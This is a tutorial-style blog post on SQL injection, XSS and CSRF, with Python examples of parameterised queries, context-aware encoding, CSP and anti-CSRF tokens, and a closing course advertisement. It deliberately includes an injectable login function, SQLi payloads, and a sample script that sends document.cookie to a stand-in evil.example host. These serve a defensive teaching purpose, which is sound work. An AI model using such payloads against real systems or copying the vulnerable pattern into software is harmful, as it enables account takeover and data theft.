Web applications are one of the main ways services are delivered to users in the digital age, and that dependency brings serious risk from cyber-attacks. SQL injection (SQLi), cross-site scripting (XSS) and cross-site request forgery (CSRF) are among the most commonly exploited web vulnerabilities. Understanding how they work, together with the right mitigations, is essential to protecting sensitive data and securing web applications.
This post covers these common web vulnerabilities and how each can be prevented:
SQL Injection (SQLi)
SQL injection is an attack in which the attacker supplies crafted input (for example in a login form or a URL parameter) that the application concatenates into an SQL statement, so that the input is interpreted as SQL rather than as data. A successful injection can let the attacker read data they are not authorised to see, modify or delete records, bypass authentication or, depending on the database configuration, take control of the database server.
Mitigation Strategies for SQL Injection:
Use Parameterised Queries: Prepared statements with bound parameters keep the SQL text fixed and pass user input separately as values, so the database never parses the input as part of the query. This is the primary defence; the measures below are defence in depth.
Input Validation: Validate input against the expected type, length and format (an allow-list) and reject anything else. Validation reduces the attack surface but does not replace parameterisation.
Limit Database Permissions: Connect with a database account that has only the privileges the application needs (for example SELECT on the specific tables it reads, and no DROP or administrative rights), so that a successful injection is contained.
Use ORM Frameworks: Object Relational Mapping (ORM) frameworks build parameterised queries by default, which removes most hand-written SQL. Note that ORMs also expose raw-query methods, and building SQL strings for those reintroduces the same vulnerability.
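The difference between string-built and parameterised queries is easiest to see side by side. The following is an added example, not code from the original post: it runs both patterns against a constructed in-memory SQLite table with two classic payloads (a comment marker that removes the password check, and a tautology that matches every row). The table, rows and function names are assumptions for the demonstration; a real application would store password hashes, never plaintext.

```python
import sqlite3

# Constructed sample data (assumed, not from the original post).
SAMPLE_USERS = [
    (1, "alice", "s3cret"),
    (2, "bob", "hunter2"),
    (3, "admin", "correct-horse"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database populated with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """The injectable pattern: user input is concatenated into the SQL text,
    so quotes and comment markers in the input become part of the query."""
    sql = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password: str) -> list:
    """Parameterised query: the SQL text is fixed and the driver sends the
    values separately, so the input is only ever compared as data."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def demo() -> dict:
    """Run both implementations with the same inputs and collect the rows."""
    conn = make_db()
    # Close the string literal, then comment out the password check.
    payload_comment = "admin' --"
    # Make the WHERE clause true for every row (AND binds tighter than OR).
    payload_tautology = "' OR '1'='1"
    return {
        "vuln_comment": login_vulnerable(conn, payload_comment, "wrong"),
        "safe_comment": login_safe(conn, payload_comment, "wrong"),
        "vuln_tautology": login_vulnerable(conn, payload_tautology, payload_tautology),
        "safe_tautology": login_safe(conn, payload_tautology, payload_tautology),
        "legit": login_safe(conn, "bob", "hunter2"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:15s} -> {rows}")
```

The vulnerable function returns the admin row for a wrong password and every row for the tautology; the parameterised function returns nothing for either payload, because the quote and the comment marker are just characters in a username that does not exist.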
Cross-Site Scripting (XSS)
Cross-site scripting occurs when an attacker gets script into a page the application serves, so that it runs in the victim's browser with the privileges of the vulnerable site's origin. The script can then read cookies or session tokens, perform actions as the victim, or capture any other sensitive data the page has access to.
Types of XSS:
Stored XSS: The malicious script is persisted on the server (for example in a comment, profile field or database record) and is served to every user who loads the affected page.
Reflected XSS: The malicious script arrives in the request, typically in a URL parameter, and the server echoes it back unencoded in the response, where the victim's browser executes it; the victim is usually lured into opening a crafted link.
DOM-Based XSS: The flaw is in client-side JavaScript that writes attacker-controlled data (such as part of the URL) into the DOM unsafely, so the injection happens entirely in the browser without the server reflecting anything.
Mitigation Strategies for XSS:
Output Encoding: Encode all user-controlled content for the context it is rendered in (HTML body, attribute, JavaScript, URL) immediately before output, so the browser treats it as text rather than as markup or code.
Input Validation: Validate and sanitise user input on the server, but treat this as secondary to output encoding, since the same data may later be rendered in several different contexts.
Use Content Security Policy (CSP): A strong CSP tells the browser which sources scripts and other resources may be loaded from, so an injected inline script is blocked even where encoding was missed.
Avoid Inline JavaScript: Move scripts and event handlers into external files (or mark them with CSP nonces) so that a policy without 'unsafe-inline' can be enforced; refactoring away inline JavaScript is what makes a strict CSP possible.
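Context-aware output encoding plus a CSP header, as an added example that is not part of the original post. It renders a constructed user comment with each value encoded for the context it lands in, and includes the check practitioners often forget: entity-encoding does not neutralise a javascript: URL in an href, so URL attributes need a scheme allow-list as well. The comment data, the template shape and the function names are assumptions for the demonstration.

```python
import html
import secrets
from urllib.parse import urlsplit

# Constructed user inputs (assumed, not from the original post).
SAMPLE_COMMENTS = [
    "Great post!",
    "<script>document.location='https://evil.example/?c='+document.cookie</script>",
    '" onmouseover="alert(1)',
]


def encode_for_html_body(value: str) -> str:
    """Encode for an HTML text node: & < > \" ' all become entities."""
    return html.escape(value, quote=True)


def encode_for_attribute(value: str) -> str:
    """Same entity set; the template must also always quote the attribute,
    otherwise a space in the input could start a new attribute."""
    return html.escape(value, quote=True)


def safe_href(url: str) -> str:
    """Entity encoding does not stop javascript: or data: URLs in href/src,
    so URL-valued attributes additionally need a scheme allow-list."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"


def render_comment(author: str, text: str, homepage: str) -> str:
    """Render one comment with every user-controlled value encoded for the
    context it is placed in: quoted attribute, URL attribute, text node."""
    return (
        f'<p class="comment" data-author="{encode_for_attribute(author)}">'
        f'<a href="{encode_for_attribute(safe_href(homepage))}">'
        f"{encode_for_html_body(author)}</a>: "
        f"{encode_for_html_body(text)}</p>"
    )


def new_nonce() -> str:
    """Fresh per-response nonce for scripts the page legitimately inlines."""
    return secrets.token_urlsafe(16)


def csp_header(nonce: str) -> str:
    """Restrictive Content-Security-Policy value: scripts only from the page's
    own origin or carrying this response's nonce, no plugins, no <base> abuse.
    An injected inline <script> without the nonce is not executed."""
    return (
        f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; base-uri 'none'"
    )


if __name__ == "__main__":
    print("Content-Security-Policy:", csp_header(new_nonce()))
    print(render_comment("mallory", SAMPLE_COMMENTS[1], "javascript:alert(1)"))
    print(render_comment(SAMPLE_COMMENTS[2], "hi", "https://example.org/"))
```

In practice the encoding is done by a templating engine with auto-escaping enabled; the point of hand-writing it here is to show that the encoder depends on the output context, and that JavaScript-string and CSS contexts need different encoders again.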
Cross-Site Request Forgery (CSRF)
Cross-site request forgery tricks an authenticated user's browser into sending a request the user did not intend, such as changing account details or making a transaction. The forged request originates from an attacker-controlled page, but because the browser automatically attaches the victim's session cookie, the application treats it as a legitimate action by the victim.
Mitigation Strategies for CSRF:
Use Anti-CSRF Tokens: Include an unpredictable token, tied to the user's session, in every state-changing form or request. The server must validate the token before it performs the action and reject the request if the token is missing or does not match; an attacker's page cannot read the token and so cannot forge a valid request.
Same-Site Cookies: Set the SameSite attribute (Lax or Strict) on session cookies so the browser does not send them with cross-site requests. Lax still sends cookies on top-level GET navigations, so state-changing actions must never be reachable via GET.
Double Submit Cookies: The server sets a random token in a cookie, and the client must send the same value again in the request body or a header; the server checks that the two match. An attacker's page can neither read nor set the victim's cookie for the target site, so it cannot supply a matching pair.
Enforce User Confirmation for Critical Actions: A CSRF attack succeeds silently because the state change needs no further input from the user. Requiring explicit confirmation, such as re-entering the password or a one-time code, for sensitive actions like fund transfers or account changes removes that silence.
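The token checks described above, as an added example that is not part of the original post. It shows a synchroniser token stored in the server-side session and checked before the action runs, a keyed double-submit token with its Set-Cookie header, and a simulated cross-site request that does not carry the token and is rejected with no state change. The session dictionary, the transfer endpoint, the signing key and the cookie name are assumptions for the demonstration.

```python
import hashlib
import hmac
import secrets

# Server-side signing key: assumed to come from configuration in a real
# deployment, generated here so the example runs stand-alone.
SERVER_KEY = secrets.token_bytes(32)


def issue_session_token(session: dict) -> str:
    """Synchroniser token: a random value kept in the server-side session and
    embedded as a hidden field in every state-changing form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def handle_transfer(session: dict, form: dict) -> dict:
    """State-changing endpoint (assumed POST). The token is checked *before*
    anything is done; on a mismatch the request is refused and nothing changes."""
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return {"status": 403, "error": "missing or invalid CSRF token"}
    # Only now is the business action performed.
    amount = int(form.get("amount", "0"))
    session["balance"] = session.get("balance", 0) - amount
    return {"status": 200, "balance": session["balance"]}


def issue_double_submit_token(session_id: str) -> str:
    """Double-submit variant: the token is an HMAC of the session id under the
    server key, so an attacker who could plant a cookie still cannot mint one."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_cookie_header(token: str) -> str:
    """Set-Cookie value for the double-submit cookie. It is not HttpOnly because
    client-side code echoes it into the request; SameSite=Lax means the browser
    will not even attach it to a cross-site POST."""
    return f"csrf={token}; Path=/; Secure; SameSite=Lax"


def check_double_submit(cookies: dict, form: dict, session_id: str) -> bool:
    """Valid only if cookie and form carry the same value and that value is the
    one this server derived for the session."""
    expected = issue_double_submit_token(session_id).encode()
    cookie_value = cookies.get("csrf", "").encode()
    form_value = form.get("csrf", "").encode()
    return hmac.compare_digest(cookie_value, expected) and hmac.compare_digest(
        form_value, expected
    )


def simulate() -> dict:
    """Legitimate form submission versus a forged cross-site submission."""
    session = {"balance": 100}
    token = issue_session_token(session)
    # The attacker's page can auto-submit a form with the victim's cookies
    # attached, but it cannot read the token out of the victim's page.
    forged = handle_transfer(session, {"amount": "40", "to": "attacker"})
    legit = handle_transfer(session, {"amount": "40", "to": "bob", "csrf_token": token})
    return {"forged": forged, "legit": legit, "balance": session["balance"]}


if __name__ == "__main__":
    print(simulate())
    print(csrf_cookie_header(issue_double_submit_token("sess-1")))
```

Ordering is the part that matters: the comparison happens first and the balance update only afterwards, and the comparison uses a constant-time check so the token cannot be guessed byte by byte through timing.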
Conclusion
Web applications are at the forefront of cyber-attacks, and the most significant threats include SQL Injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). These risks can be minimised and applications protected through sound security practices, including parameterised queries, input validation, context-aware output encoding and anti-CSRF tokens. This is a crucial part of cyber security and ethical hacking; if you want to go deeper into these topics and understand the world of ethical hacking, the London School of Emerging Technology (LSET) covers these essential topics in depth in its Ethical Hacking course. You can enrol in the course and get the opportunity of an internship where you can become an industry-standard ethical hacker.